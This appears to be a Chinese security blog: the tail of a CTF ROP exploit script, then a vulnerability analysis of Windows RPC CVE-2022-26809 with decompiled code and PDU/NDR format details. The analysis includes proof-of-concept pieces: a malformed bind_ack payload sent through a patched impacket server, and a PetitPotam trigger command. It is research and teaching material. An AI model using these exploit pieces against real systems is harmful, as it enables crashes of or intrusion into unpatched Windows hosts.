rop_payload += pop_rdi
rop_payload += p64(stack+9*8)
rop_payload += syscall
rop_payload += b'/getFlag\0' # give binary
write(0,rop_payload)
# 0x14790+8 save pointer
# 0x14760 save data

r.interactive()

一些碎碎念

这个题本质上我觉得是一个纯的二进制题。这个题其实从侧面突出了这几年pwn的一个做题趋势，就是【不去完全看懂程序逻辑，而是着重于漏洞发现】。举个我逆向中的例子，这个程序有一段拷贝数据的逻辑:

直接看逻辑会有一点莫名其妙：因为在上面的IOStruct中，对应的向量的变量成员和赋值对应的内容可以说是完全无关，而在后面的逻辑中，这些成员又变得合理。这其实是一种变量复用的现象。假设存在如下代码:

int func()
{
    int a = 1;
    puts("input number a");
    scanf("%d",a);
    a += 1;
    printf("a is %d", a);

    int b = 2;
    puts("input number b");
    scanf("%d",b);
    b += 3;
    printf("b is %d" ,b);
}

对于上述代码，a在代码后方完全没出现过，b也完全没有在前方出现过。此时对于编译器来说，他就有一种选项，也就是让a和b公用一段内存空间。然而此时对于尝试逆向的人来说，就会无法区分这两个变量到底是不是同一个变量。更有甚者，可能会有如下的现象:

struct Large{
    int a;
    int b;
};

struct Small{
    char c;
};
int func2()
{
    struct Big g;
    g.a = 1;
    g.b = 2;
    // ...
    struct Small s;
    s.c = 'a';
}

上面列出了两个大小不同的结构体，并且同时存在栈上。这种时候，某些编译器甚至会再g的逻辑后，将g的一部分内存直接用于存放s的内容。这种内存覆盖就会对代码的分析造成极大的困惑。
而前阵子和其他队友做题的时候，我也发现，最近的pwn题做起来更像是【先用fuzz等技巧先发现了漏洞，再顺着漏洞往下探索】，很多时候似乎做题的人也没有搞懂逻辑，但是他们就是能把题目做出来，这可能是现代CTF比赛中，pwn题的一种必然趋势吧。
说起来，最近沉迷于探索一些真实漏洞，感觉是不是也可以参照这种思路来思考呢。。？

Windows-CVE-2022-26809

2022-04-30T02:27:33.000Z

书接上篇，这边将对漏洞相关细节进行一些分析:

漏洞相关

在博客写完差不多一个月之后。。。corelight中给出了该漏洞的相关检测方案，HuanGMz师傅提醒我，可能之前分析的点并不是真正的漏洞点，于是只好重新对漏洞点进行分析。。（幸好看博客和github的人不多，整整一个月的打脸(￣ε(#￣)）新的分析也是师傅带着完成的，师傅发的文章写的比较有条理，这边就做一下分析经验学习。。

核心漏洞点(新)

用Bindiff能发现，以下五个API发生了明显的修复

OSF_SCALL::ProcessReceivedPDU
OSF_SCALL::GetCoalescedBuffer

OSF_CCALL::ProcessReceivedPDU
OSF_CCALL::GetCoalescedBuffer
OSF_CASSOCIATION::ProcessBindAckOrNak

可以看到，后三个API开头为OSF_C，这个C肯定就是Client，一个9.8分的漏洞怎么会是客户端的漏洞呢，不可能的啦。结果是我才疏学浅了，真的是这个位置触发的。。

如何让服务器调用客户端API

这个原理与另一个漏洞的利用方式有关：CVE-2021-43893

这个漏洞利用了Windows的一个叫做Encrypted File System（EFS）加密文件系统的特性，其中最关键的点在于，EFSRPC支持UNC Path，也就是可以以如下的方式来访问文件:

1	\\10.0.0.1\Share\Test\Foo.txt

而EFS可以通过发送RPC请求来将服务器侧上的文件下载下来，详情见此
概括来说，当我们发送一个EfsRpcOpenFileRaw请求，并且此时包含有UNC路径的时候，服务器就需要向一个UNC中指定的路径进行数据请求访问。该漏洞提到的一个渗透工具PetitPotam会利用这种简介请求来获取受害服务器的NTLM hash，而这个过程其实也是一个RPC。也就是说，利用这个思路，我们可以让受害者主机由服务器的身份变为客户端。相对于服务端，客户端的API往往会相对脆弱，利用这个思路就能将攻击面扩大到客户端API上！

漏洞细节

这个点之后，回到看有问题的函数OSF_CASSOCIATION::ProcessBindAckOrNak:

__int64 __fastcall OSF_CASSOCIATION::ProcessBindAckOrNak(
        struct_this *this,
        struct_buffer *buffer,
        unsigned int buf_length,
        struct OSF_CCONNECTION *a4,
        struct OSF_CCALL *a5,
        struct OSF_BINDING **a6,
        enum FAILURE_COUNT_STATE *a7)
{
    if ( buffer->type == 12 )                   // rpc_bind_ack
    {
      //....
    }
    last_length = buf_length - 26;
    if ( buffer->sec_addr )
    {
      like_padding = buffer->sec_addr + ((-2 - buffer->sec_addr) & 3);
      if ( last_length < like_padding )
        return 1728i64;
      latest_length = last_length - like_padding;
      v15 = like_padding;
    }
    else                                        // after patch:
                                                // else if(type == 15)
    {
      latest_length = buf_length - 28;
      v15 = 2i64;
    }
    pointer = &buffer->offset + v15;
    v17 = (unsigned __int8)*pointer;

}

函数主要用于处理RPC请求过程中，处理RPC的ack绑定的过程。这个绑定过程中涉及了两种类型的ack:

bind_ack，表示一个bind的请求被接受。此时会返回这种数据包，底层以数字12表示
alter_context_resp，这个表示接受发生上下文变化的请求，并且返回该种数据包，底层以数字12表示

其中文档交代，两个ack的头部是一样的，这里贴出其中一个展示

typedef struct {
        /* start 8-octet aligned */

    /* common fields */
    u_int8  rpc_vers = 5;       /* 00:01 RPC version */
    u_int8  rpc_vers_minor      /* 01:01 minor version */
    u_int8  PTYPE = alter_context_response; /* 02:01 alter
                                                context response PDU */
    u_int8  pfc_flags;          /* 03:01 flags */
    byte    packed_drep[4];     /* 04:04 NDR data rep format label*/
    u_int16 frag_length;        /* 08:02 total length of fragment */
    u_int16 auth_length;        /* 10:02 length of auth_value */
    u_int32  call_id;           /* 12:04 call identifier */

    /* end common fields */

    u_int16 max_xmit_frag;      /* ignored */
    u_int16 max_recv_frag;      /* ignored */
    u_int32 assoc_group_id;     /* ignored */
    port_any_t sec_addr;        /* ignored */

    /* restore 4-octet alignment */

    u_int8 [size_is(align(4))] pad2;

    /* presentation context result list, including hints */

    p_result_list_t     p_result_list;    /* variable size */

    /* optional authentication verifier */
    /* following fields present iff auth_length != 0 */

    auth_verifier_co_t   auth_verifier; /* xx:yy */
} rpcconn_alter_context_response_hdr_t;

漏洞的核心触如下：

根据描述猜测，可能alter_context_resp的请求在请求头之后，会跟随一些描述变更情况的数据，而由于代码判断过程中，忘记检查type==15，也就是是否为alter_context_resp，此时如果请求头部的种类为bind_ack，并且我们发送的数据只有头部，此时BufferLength_Argu的长度就只有26，一旦进入else逻辑此时就会进行运算

1	v14 = BufferLength_Argu - 28;// 0xfffffffe

而v14作为长度，是一个无符号整数，其将整数溢出，从而导致漏洞的发生！

环境和PoC

由于这个漏洞触发需要服务器支持，这边准备的环境如下:

其中：

Trigger机器上运行PetitPotam，用于触发RPC
Victime机器上为老版本RPCRT4.dll，可怜受害者
Attacker上运行一个假的SMB服务，并且返回畸形数据包

首先我们在Attacker机器上起一个假SMB服务

from impacket.smbserver import SimpleSMBServer


myserver = SimpleSMBServer(listenPort=445)
myserver.addShare("Test","/test/path/for/smb","")
myserver.start()

注意的是，这个/test/path/for/smb是需要真实存在的，包括路径下一定要有SMB请求的文件，不然的话RPC请求会失败，从而无法进入bind_ack的逻辑。
同时，可以参考
corelight中的截图，将impacket的rpcrt.py中，DCERPCServer的bind函数进行修改:

def bind(self, packet, bind):
    NDRSyntax   = ('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0')
    data = b'\x05\x00\x0c\x03\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x02\x10\xb8\x10\xb8\x00\x00\x12\x34\x00\x00'
    print("real payload:")
    print(data)
    # self._clientSock.send(resp.getData())
    self._clientSock.send(data)

    # self._clientSock.send(data)
    return None

然后在Trigger机器上运行PetiPotam，运行指令如下:

1	python petitpotam.py -pipe lsarpc -method DecryptFileSrv -debug "user:password@192.168.6.135" "\\192.168.6.136\realfile

之后就能观察到相关的请求数据包:

此时就能触发漏洞！

BSOD？

然而漏洞触发之后，也不一定能触发BSOD，理由在这:

尽管我们触发了漏洞，但是在之后的逻辑中，会先检查Pointer指向的内容是否为空。虽然Buffer的理论大小为26（也就是bind_ack头部数据大小），而此处的Pointer已经是一个越界访问，但是这个地方的内容实际上并不是我们可控的，所以会在一开始的check就被扔掉。。。
不过如果有办法能够控制目标机器中的堆内存，进行堆风水排布的话，说不定还是能够实现控制的，这个就有待进一步研究了。。

核心漏洞点(旧)

Patch修复的位置有如下两个位置可以参与漏洞利用:

OSF_SCALL::ProcessReceivedPDU()
{
    // skip some code
    Length = v50;
    if ( !(unsigned int)QUEUE::PutOnQueue((OSF_SCALL *)((char *)this + 600), (char *)v6 + 24, v50) )
    {
        *((_DWORD *)this + 147) += Length;     // vuln!!
}

GetCoalescedBuffer()
{
  v7 = a3 | v5;
  RtlEnterCriticalSection((PRTL_CRITICAL_SECTION)this + 12);
  v10 = *((_DWORD *)this + 147);                // BufferLength from ProcessReceivedPDU
  if ( !v10 )
    goto LABEL_6;
  if ( v7 )
    v10 += a2->BufferLength;                    // VULN!!!
}

首先我们可以看到第一个函数ProcessReceivedPDU，这里提到了PDU，这个玩意儿的名字是protocol data unit的缩写。微软官方的解释是:

RPC PDU: A protocol data unit (PDU) originating in the remote procedure call (RPC) runtime.

在这里详细的介绍了这个概念。这个概念在之后我们会进一步探究。

这位大佬详细的介绍了自己的分析思路，可以先跟着他的操作进行初步学习。通过学习分析思路会发现，视频中无法进入的分支是因为存在一个需要设置的标志位

通过逆向分析可以发现，这个标志位其实标志的就是上文提到的Pipe对象。只有当Server端的接口为Pipe接口的时候，这个位置才会被置为1。根据观察分析，因为pipe对象允许类似队列Buffer的工作机制，所以可能需要有单独的处理逻辑。而正是没能正确的处理队列逻辑，导致了漏洞的出现。

不过在Server端存在Pipe的情况下，我发现代码会反复的陷入这个位置:

这段逻辑的工作类似于：将传入的Buffer进行解析，如果满足条件之后，则进入DispatchRPC的逻辑，而当进入这个分支之后，代码就不会回来了。为了搞清楚这个逻辑，这里需要深入理解一下发送的数据包格式：

PDU格式

PDU的格式可以看这里。这边我们选取几个重要的讲一下:

typedef struct {

      /* start 8-octet aligned */

      /* common fields */
        u_int8  rpc_vers = 5;       /* 00:01 RPC version */
        u_int8  rpc_vers_minor;     /* 01:01 minor version */
        u_int8  PTYPE = request ;   /* 02:01 request PDU */
        u_int8  pfc_flags;          /* 03:01 flags */
        byte    packed_drep[4];     /* 04:04 NDR data rep format label*/
        u_int16 frag_length;        /* 08:02 total length of fragment */
        u_int16 auth_length;        /* 10:02 length of auth_value */
        u_int32  call_id;           /* 12:04 call identifier */

      /* end common fields */

      /* needed on request, response, fault */

        u_int32  alloc_hint;        /* 16:04 allocation hint */
        p_context_id_t p_cont_id    /* 20:02 pres context, i.e. data rep */
        u_int16 opnum;              /* 22:02 operation # 
                                     * within the interface */

      /* optional field for request, only present if the PFC_OBJECT_UUID
         * field is non-zero */

        uuid_t  object;              /* 24:16 object UID */

      /* stub data, 8-octet aligned 
                   .
                   .
                   .                 */

      /* optional authentication verifier */
      /* following fields present iff auth_length != 0 */
 
        auth_verifier_co_t   auth_verifier; /* xx:yy */

} rpcconn_request_hdr_t;

上述为Request PDU格式，也是当我们Client像Server发送请求，包括Server pull 来自Client的数据的时候，RPCRT4中使用的一种格式。格式中有几个重要的成员变量

pfc_flags：表示当前请求的类型，目前常见的有PFC_FIRST_FRAG以及PFC_LAST_FRAG
packed_drep：用于表示当前PDU请求中每个元素的类型。
frag_length：用于表示每个fragment切片的大小
alloc_hint：用于描述当前建议server端分配的数据大小
opnum：由于描述当前操作的是Server的哪个接口

在request之后，就会紧跟着body，也就是发送的数据结构体。

我们将之前文章中编译的的Pipe实际的例子跑一下看看：

可以看到这边使用的是DCERPC协议，其实就是OSF-DCE Open Software Foundation Distributed Computing Environment定义的一种协议，包括上文提到的PDU也在其中。然后我们看到数据包中有记录First 和 Last数据包，就是由flags控制的

这边可以看到发送的数据包在发送过程中，会给出frag_length和alloc_hint。然而会发现两者长度不完全一致，这是由于alloc_hint用于描述建议server端用于存放NDR数据的大小。这个大小不包含当前rpcconn_request_hdr_t的大小。而frag_length表示的是单次发送的fragment大小，其包含了rpcconn_request_hdr_t(24字节)，当存在认证的场合，还需要分配对应的认证用context。两者的大小不一定相等（这也导致了后方漏洞的出现）

NDR Network Data Representation

在数据传输的时候，RPC会使用NDR来描述当前传输的数据类型。NDR可以简单的理解成一个TLV协议的结合体。RPC内置的属性都可以用NDR进行操作。
这里我们关注Pipe的NDR类型

其官方描述如下

NDR represents a pipe as a sequence of chunks, not necessarily all containing the same number of elements. A chunk can contain at most $2^{32}-1$ elements of the pipe. The number of chunks is potentially unlimited. NDR represents each chunk as an ordered sequence of representations of the elements in the chunk, preceded by an unsigned long integer giving the number of elements in the chunk. The final chunk is empty; it contains no elements and consists only of an unsigned long integer with the value 0 (zero).

从描述中我们可以得知：

Pipe中其实最多可以传输 $2^{32}-1$ 个元素
最后一个元素通常为空

这边注意，Pipe中，前四个字节存放的是元素的数量，而非总共的长度，这点要注意。。

1	比如说Long对象，理论上chunk=1的时候，NDR的总长度为4+4 = 8

当check不满足的时候（后文会根据chunk的数量申请内存大小。如果内存太小发生越界，则拷贝不发生，并且抛出bad_ndr的错误）

再RPCRT4中，管对这个NDR解析的过程叫做Unmarsharl，大致可以理解成反序列化

重回ProcessReceivedPDU

根据前文的前置知识，我们知道发送的PDU数据中，存在一个叫做Fragment 分片的概念，结合文档中提到的分片发送，不难猜测，整个漏洞的核心原因应该是分片Fragment发生合并的时候导致的整数溢出。通过调试可以还原部分的数据结构，其中ProcessReceivedPDU函数中的漏洞函数如下:

FragmentLength = Size;
if ( !(unsigned int)QUEUE::PutOnQueue((QUEUE *)&this->queue, (char *)PDUBuffer + 24, Size) )
{
    this->TotalLength += FragmentLength;

可以看到，这边将PDUBuffer加入了一个queue中，并且将每次传入的FragmentLength叠加到当前对象的TotalLength成员变量中，这边忘记检查当前的分片长度是否溢出，从而导致存在了整数溢出。可以猜测，后文应当存在一个逻辑，将此处压入的Buffer数据包取出，然后送入另一个buffer中，而由于这边算的长度存在问题，从而导致了越界写的问题。

然后我们回到前文提到的另一个问题：代码流程无法进入漏洞触发点，而是提前就进入了DispatchRPC，这段其实和分发逻辑有关，这边存在几种情况:

分包逻辑1：快速处理逻辑

当我们发出的数据包为PFC_FIRST_FRAG与PFC_LAST_FRAG flag同时设置的时候，会进入前文的快速分发逻辑，导致不会发生分片

if ( (Flags & 1) != 0 )                     // PFC_FIRST_FRAG
{
    if ( *dispatchbuffer_ptr && !this->CallStack )
    goto SC_CLEAN_UP_TO;
    if ( (Flags & 2) != 0 )                   // PFC_LAST_FRAG
    {
    this->DispatchBufferOffset = theFragSize;// here will just dispatch packet
    *dispatchbuffer_ptr = v25;
LABEL_53:
    this->CurrentState = 3;
    if ( (this->dword2E0 & 4) != 0 )
    {
        _InterlockedAnd(this->Connection + 107, 0xFFFFFFFD);
        this->dword2E0 &= ~4u;
    }
    v27 = PTYPE;
    return OSF_SCALL::DispatchRPCCall(this, v27);

分包逻辑2：分包，但是大小足够

当我们发出的数据包有多个，其中第一个为PFC_FIRST_FRAG的同时不为PFC_LAST_FRAG的场合，此时会判断allocHint大小判断

alloc_hint = *(Packet + 4);
if ( alloc_hint )
{
    this->AllocHint = alloc_hint;
}
else
{
    alloc_hint = theFragSize;
    this->AllocHint = theFragSize;
}

如果此时发包不足allocHint大小，意味着此时ServerBuffer足够缓存数据，于是直接拷贝到缓存的Buffer中

if ( !OSF_SCALL::GetBufferDo(*CurrentBinding, &this->DispatchBuffer, AllocHint, 1, v49, v50) )
{
    v47 = theFragSize;
    memcpy_0(*dispatchbuffer_ptr + this->DispatchBufferOffset, Packet + 24, theFragSize);
    v48 = this->Connection;
    this->DispatchBufferOffset += v47;
    (*(*v48 + 64i64))(v48, Packet);         // DispatchRPCCall
    if ( (Flags & 2) == 0 ) // PFC_LAST_FRAG
        return 0i64;
    goto LABEL_53;

并且如果包为PFC_LAST_FRAG，则单次传输结束。

如果使用微软官方提供的sample，是无法触发漏洞点的，因为官方的allocHint大小每次都是同时存在PFC_FIRST_FRAG和PFC_LAST_FRAG导致每次都会立刻进行Dispatch，最终导致错过漏洞触发条件。

分包逻辑3：触发RPC分发逻辑，但是同时发生分包

总结一下，为了能够触发漏洞，我们需要

将发送的数据包分为PFC_FIRST_FRAG和多个数据包，最后跟着一个PFC_LAST_FRAG
allocHint字段给出的buffer大小需要不足以承受之后所有的数据包

当满足上述两个条件之后，当第一个数据包进入了DispatchRPC，程序就会进入数据处理逻辑，同时由于此为多线程处理逻辑，Server还会接受之后到来的数据包，此时由于

已经有数据包进行了分发
申请的Buffer大小已经消耗完成

所以此时只能将数据包压入队列，等满足条件再进行数据合并，于是能够进入后方的PutQueue逻辑:

FragmentLength = Size;
if ( !(unsigned int)QUEUE::PutOnQueue((QUEUE *)&this->queue, (char *)PDUBuffer + 24, Size) )
{
    this->TotalLength += FragmentLength;

于是能触发这段逻辑。

再实验的时候，这里使用了python脚本，以及引入库impacket.dcerpc.v5.rpcrt进行数据发送，但是这个库会将AllocHint设置成正好能够放得下所有请求的NDR大小总和的数值，导致最后都会被一次性发送给DispatchRPCCall，导致无法进入后方的逻辑。于是这边需要手动修改这个包的处理逻辑（直接修改库中的代码才行），将allocHint的大小改成每次发送的fragment的实际大小即可（一般来说，fragment因为存在头部数据大小（32bit为24字节）的真实大小会略大于allocHint，可以通过wireshark进行调整）

NDR格式Check

再尝试发送请求的数据的时候，一直有一个bad_ndr的错误。后来经我观察，发现RPCRT4并没有严格按照之前提到的规范来实现Pipe。再NdrReadPipeElements中会调用NdrpReadPipeElementsFromBuffer进行数组数据的读取，其中

if ( !(*(*a1->pipeHelper + 96i64))(a1->pipeHelper, pipe_message, &UnMarshalLength) )// NDR_PIPE_HELPER32::UnmarshallChunkCounter
  return;
ChunkNum = UnMarshalLength;
a1->UnMarshalLength = UnMarshalLength;
a1->Length = ChunkNum;
if ( ChunkNum )
{
  if ( a1->minSize > ChunkNum || a1->MaxSize < ChunkNum )// shellcode需要精心构造，不然会陷入这里
    NdrpRaisePipeException(a1, 1734);
  a1->state = 1;
}

完成反序列化之后，这里的Chunk数量居然要和这里的minSize和maxSize比较。这两个变量的含义是Pipe中能够存放的最大元素。minSize自然为0，而maxSize居然只有短短的0xffffff。 多少有点小了吧,文档原文不是说可以很大的吗 ，于是这边我们需要严格按照如下的格式构造请求的数据体:


# +--------------+-------+-------+-------+
# |  Item count  | item1 | item2 | ....
# +--------------+-------+-------+-------+
def format_fragment_data(data, frag_size):
    data_len = len(data)
    frag_size -= 4
    if data_len < frag_size:
        return u32(len(data)//4) + data + u32(0)
    start_index = 0
    outer = b""
    while data_len > 0:
        outer += u32(frag_size//4)
        outer += data[start_index:start_index+frag_size]
        data_len -= frag_size
        start_index += frag_size
        if data_len < frag_size:
            # print(u32(data_len))
            outer += u32(data_len//4)
            outer += data[start_index:start_index+data_len]
            break

    return outer+u32(0)

当我们的chunk大小合理之后，就不会被这边卡住了，函数的后方会调用NdrpPipeElementConvertAndUnmarshal，对这个Pipe中的每一个元素进行Unmarshal。

进入`OSF_SCALL::GetCoalescedBuffer`前的最后准备

根据观察，会发现不是每次NdrpReadPipeElementsFromBuffer调用完成之后，都能够进入OSF_SCALL::GetCoalescedBuffer。于是要来观察当前函数的触发逻辑：

if ( (a1->field_12 & 0x20000) == 0 )
{
    NdrpReadPipeElementsFromBuffer(a1, v25, &v26, v19, &hasReadElem);
    hasChunkTailCounterFlag_1 = a1->hasChunkTailCounterFlag;
    readElem = hasReadElem;
}
v19 = willReadElem - readElem;
if ( (willReadElem - readElem <= 0 || (hasChunkTailCounterFlag_1 & 1) != 0) && (hasChunkTailCounterFlag_1 & 2) == 0 )
    break;
if ( readElem )
    break;
HIWORD(a1->field_12) |= 2u;
NdrPartialReceive(a1, v25, p_enable[7]); // 这个函数就是进入GetCoalescedBuffer的关键，同时这里也会进行NDR的check的异常抛出

可以看到，当前函数的调用中，有一个非常关键的检查（据观察，后两个flag检查基本都是通过的）就是

1 2	if ( readElem ) break;

也就是说，只要我们能够让readElem的值为0，我们才能进入NdrPartialReceive。这个值是在NdrpReadPipeElementsFromBuffer中被设置的。于是这边跟如这个函数。函数使用类似状态机的代码进行维护

state = a1->state;
if ( state )
    break;
a1->int78 = 0;
if ( !(*(*a1->pipeHelper + 96i64))(a1->pipeHelper, pipe_message, &UnMarshalLength) )// NDR_PIPE_HELPER32::UnmarshallChunkCounter
    return;
ChunkNum = UnMarshalLength;
a1->UnMarshalLength = UnMarshalLength;
a1->Length = ChunkNum;
if ( ChunkNum )
{
    if ( a1->minSize > ChunkNum || a1->MaxSize < ChunkNum )// shellcode需要精心构造，不然会陷入这里
        NdrpRaisePipeException(a1, 1734);
    a1->state = 1;
}
else
{
    if ( !hasChunkTailCounterFlag )
    {
        a1->hasChunkTailCounterFlag |= 1u;
        return;
    }
    a1->hasChunkTailCounterFlag |= 2u;
    a1->state = 4;
}

state=1的时候。会尝试读取NDR数据段中的chunk字段，并且检查chunk的长度是否在规定长度内。（这点就要吐槽了一下，规定中这个chunk应该是无限长度的，这个地方居然有maxsize。。）如果ChunkNum(也就是chunk字段)不为0的时候，进入状态1：

Buffer = a2->Buffer;
a2->Buffer = (~a1->int60 & &Buffer[a1->int60]);// align
ContentBufferLength = LODWORD(a2->RpcMsg->Buffer) + a2->RpcMsg->BufferLength - LODWORD(a2->Buffer);
if ( ContentBufferLength < 0 )          // remove NDR header
{
    a2->Buffer = Buffer;
    return;
}
ElemSize = a1->WireSize;
if ( ElemSize > ContentBufferLength ) // 一般是不满足的
{
    if ( !ContentBufferLength )
    {
    a1->int78 = 0;
    return;
    }
    a1->state = 2;
}

这边首先会计算ContentBufferLength，这边的a2->RpcMsg->Buffer其实就是未处理过的Buffer，指向我们发来的NDR数据（含头部），a2->Buffer是NDR数据（不含头部）的起始地址。这个算法就能计算出来NDR body的大小。然后取出来的ElemSize表示的是pipe数据结构中，每个元素的大小。如果我们传输的是long结构体，这个地方大小就是4。之后就会进入拷贝的前的检查逻辑:

if ( !readReadLength )
    return;
if ( (ElemSize & a1->int60) != 0 )
    elem_pad = a1->int60 - (ElemSize & a1->int60) + 1;
else
    elem_pad = 0;
ContentElemCnt = (ContentBufferLength + elem_pad) / (ElemSize + elem_pad);
PipePrepareLength = a1->Length;
if ( ContentElemCnt <= PipePrepareLength )
    PipePrepareLength = ContentElemCnt;
finaRead = 0;
readLength = readReadLength;
if ( PipePrepareLength <= readReadLength )
    readLength = PipePrepareLength;
NdrpPipeElementConvertAndUnmarshal(a1, a2, v6, readLength, &finaRead);
v36 = finaRead;
readReadLength -= finaRead;
a1->Length -= finaRead;
*hasReadElem_ptr += v36;
if ( !a1->Length )
{
    a1->state = hasChunkTailCounterFlag != 0 ? 4 : 0;
if ( !readReadLength )
    return;
}

这边会根据当前数据的padding，当前缓存的大小，以及指定要读取的数据大小，选取一个合适大小的BufferLength，并且最后调用NdrpPipeElementConvertAndUnmarshal来进行pipe的数据反序列化。当读取完成之后，会减小readReadLength的大小，并且iang实际上读取出来的数据加到hasReadElem_ptr，也就是我们前文提到的hasReadElem中。

可以看到，只要数据能够读入的场合，基本上这个hasReadElem就会被设置。所以只能锁定在之前提到的一个位置：

ContentBufferLength = LODWORD(a2->RpcMsg->Buffer) + a2->RpcMsg->BufferLength - LODWORD(a2->Buffer);
if ( ContentBufferLength < 0 )          // remove NDR header
{
    a2->Buffer = Buffer;
    return;
}
ElemSize = a1->WireSize;
if ( ElemSize > ContentBufferLength ) // 一般是不满足的
{
    if ( !ContentBufferLength )
    {
    a1->int78 = 0;
    return;
    }
    a1->state = 2;
}

虽然这里说【一般不满足】，但是不妨设想一个场景：如果在反序列化的过程中，如果此时的pipe的头部已经来到了，但是body却没有及时传输过来，此时理论上就不应该进行反序列化。从代码上也能看出，如果头部正好过来了，但是body没有过来的场合，此时甚至无法满足ElemSize>ContentBufferLength，于是就会进入后文提到的NdrPartialReceive，从逻辑上讲就是先将分片进行合并，然后再对其进行数据解析。
不过经过POC测试，由于分片的时候，长度会增加4字节，基本上Buffer的长度维持和分片长度倍数的情况下，都能满足:

def format_fragment_data(data, frag_size):
    data_len = len(data)
    frag_size -= 4
    if data_len < frag_size:
        return u32(len(data)//4) + data + u32(0)
    start_index = 0
    outer = b""
    while data_len > 0:
        outer += u32(frag_size//4)
        outer += data[start_index:start_index+frag_size]
        data_len -= frag_size
        start_index += frag_size
        if data_len < frag_size:
            # print(u32(data_len))
            outer += u32(data_len//4)
            outer += data[start_index:start_index+data_len]
            break

    return outer+u32(0)

dce.set_max_fragment_size(frag_size)
data = b'B'*((frag_size)*2)
data = format_fragment_data(data, frag_size)

关键点 `OSF_SCALL::GetCoalescedBuffer` 漏洞触发

这个函数理论也被微软进行了修复:

 fForceExtra = a2->RpcFlags & 0x4000;
  v6 = 0;
  v20 = 0;
  v7 = Extra | fForceExtra;
  v8 = a2;
  RtlEnterCriticalSection(&this->rtl_critical_section1E0);
  v10 = this->receiveLengthVuln;
  if ( !v10 )
    goto LABEL_8;
  if ( v7 )
  {
    if ( UIntAdd(v10, v8->BufferLength, &Size) < 0 )  // 修复后，修复前为整数溢出
    {
      v6 = 1734;
LABEL_8:
      MUTEX::Clear(v3);
      return v6;
    }
    v10 = Size;
  }
  if ( OSF_SCALL::TransGetBuffer(v9, &v23, v10 + 24) )
  {
    v6 = 14;
    goto LABEL_8;
  }

可以看到，v10这个变量再v7被设置为Extra的时候，能够再次叠加一个Buffer，然后在之后的逻辑中:

v16 = QUEUE::TakeOffQueue(&this->osf_scall258, &Size);
 if ( v16 )
 {
   v17 = v23;
   do
   {
     v18 = Size;
     memcpy_0(v17, v16, Size);
     v17 += v18;
     (*(*this->Connection + 64i64))(this->Connection, v16 - 24);
     v16 = QUEUE::TakeOffQueue(&this->osf_scall258, &Size);
   }
   while ( v16 );
   v8 = a2;
   v3 = &this->rtl_critical_section1E0;
 }

会将之前Queue中的数据包和长度一并取出来，拷贝到对应的Buffer中。此时如果发生过整数溢出v17长度必定不可控，而且内存还是由我们控制的，是一个很容易利用的漏洞。

无法造成的溢出？

诚然，可以看到这个程序中调用了函数

1	OSF_SCALL::TransGetBuffer(v9, &v23, v10 + 24)

这边的v10就算无法触发v7，进入Extra状态，理论上也应该还能叠加一个我们前文控制的receiveLengthVuln。然而再实际测试过程中，我发现几个点：

FragmentLength本身存在长度限制（ushort类型，长度最长只能为0xffff，而且实际上设置不了这么大）
当进行多个数据包发送的过程中，每次数据包发送累计到一定的数量的时候，都会强行进入GetCoalescedBuffer。再开始的几个包肯定不足以造成溢出，并且最重要的是再GetCoalescedBuffer函数末尾，存在如下的逻辑

v8->Buffer = v12;
v8->BufferLength = v10;
v19 = this->CurrentState == 3;
this->receiveLengthVuln = 0;

一旦进入这个函数，则receiveLengthVuln就会被置为0.。。。从而造成无法溢出的问题。然而再这个函数的外层，存在这样的逻辑:

result = OSF_SCALL::GetCoalescedBuffer(this, a2, Extra);
 if ( result || (a2->RpcFlags & 0x2000) != 0 && a2->BufferLength >= Size )// Size is each time server will receive size
   return result;
 Extra = 1;

如果BufferLength >= Size，则会被返回。。。

漏洞点触发关键

但是仔细看函数的外部，会发现这个OSF_SCALL::GetCoalescedBuffer其实存在被多次调用的可能：

if ( this->receiveLengthVuln <= *(this->Connection + 92) )// Connection->MaxFrag
      {
        EVENT::Wait(&this->pvoid2C0, -1);
      }
      else
      {
        result = OSF_SCALL::GetCoalescedBuffer(this, a2, Extra);
        if ( result || (a2->RpcFlags & 0x2000) != 0 && a2->BufferLength >= Size )// Size is each time server will receive size
          return result;
        Extra = 1;
      }

从逻辑上看,a2->BufferLength存放了之前累计传入的Buffer的总长度。一旦传入的长度没能达到Size的大小，此时的Buffer就会依然被认为是ExtraBuffer，此时会进入EVENT::Wait(&this->pvoid2C0, -1);，此时程序流会重新交给ProcessReceivedPDU，让程序能够对数据包进行进一步的读取。当满足一定的条件，这边的Event会被重新唤醒，此时之前存入的a2的Buffer就能一次又一次的叠加到当前Buffer上面，同时BufferLength也会反复的进行数值叠加。如果能够控制这个值，就能够实现发送大量重复的数据包，从而实现整数溢出！

1
2

GetCoalescedBuffer -> a2->BufferLength = Receive1 -> a2->BufferLength < Size, it will wait -> ProcessReceivedPDU -> a2->BufferLength += Receive2 ->  a2->BufferLength < Size, it will wait ......
-> a2->BufferLength += Receiven, interger overflow!

Size到底是啥

这个要回到之前Pipe教学的时候提到的BigPipe概念。这个Size其实表示的当前pipe中能够存放的未合并的Buffer大小，这个大小在一开始由MDIL生成的文件中的xxx_s.c中的FormatString结构体中可以被修改：

/*  8 */0xb5,/* FC_PIPE 对应FC 也就是pipe的魔数*/
0x3,/* 3 对应【pipe符号位】，后面要考*/
/* 10 */NdrFcShort( 0xfffc ),/* Offset= -4 (6) 对应TypeOffset */
/* 12 */NdrFcShort( 0x4 ),/* 4 对应前文用于check的Size，其大小需要和Size对齐，其根据pipe符号位可以改变为4字节*/
/* 14 */NdrFcShort( 0x4 ),/* 4 对应上文的Size，其根据pipe符号位可以改变为4字节*/
/* 16 */
0x11, 0x4,/* FC_RP [alloced_on_stack] */
/* 18 */NdrFcShort( 0x4 ),/* Offset= 4 (22) */
/* 20 */0x8,/* FC_LONG */
0x5c,/* FC_PAD */

也就是这一段。这里的Size就是我们之前提到的，检查GetCoalescedBuffer调用结束后，读到的BufferLength是否过大的Size，可以看到这个地方仅为4（默认大小），并且如前文提到的，这个值会在NdrReadPipeElements中被设置为0x40。此时可以发现，其大小最多仅为Short，如果我们把pipe符号位设置成0x83，那么这个字段则可扩展为Long，此时就能扩展数据，让其变成一个非常大的值。当这个Size足够大的时候，我们上文提到的GetCoalescedBuffer就能被反复调用，于是造成整数溢出的问题。

关于ProcessReceivedPDU和GetCoalescedBuffer的时机

现在已经能够知道如何触发漏洞点，所以，现在需要具体的确认这两个函数的调用时机。整个过程比较长，这边整理一下大致的调用逻辑如下：

第一次进入ProcessReceivedPDU，接受大小正好的包，进行dispatch。
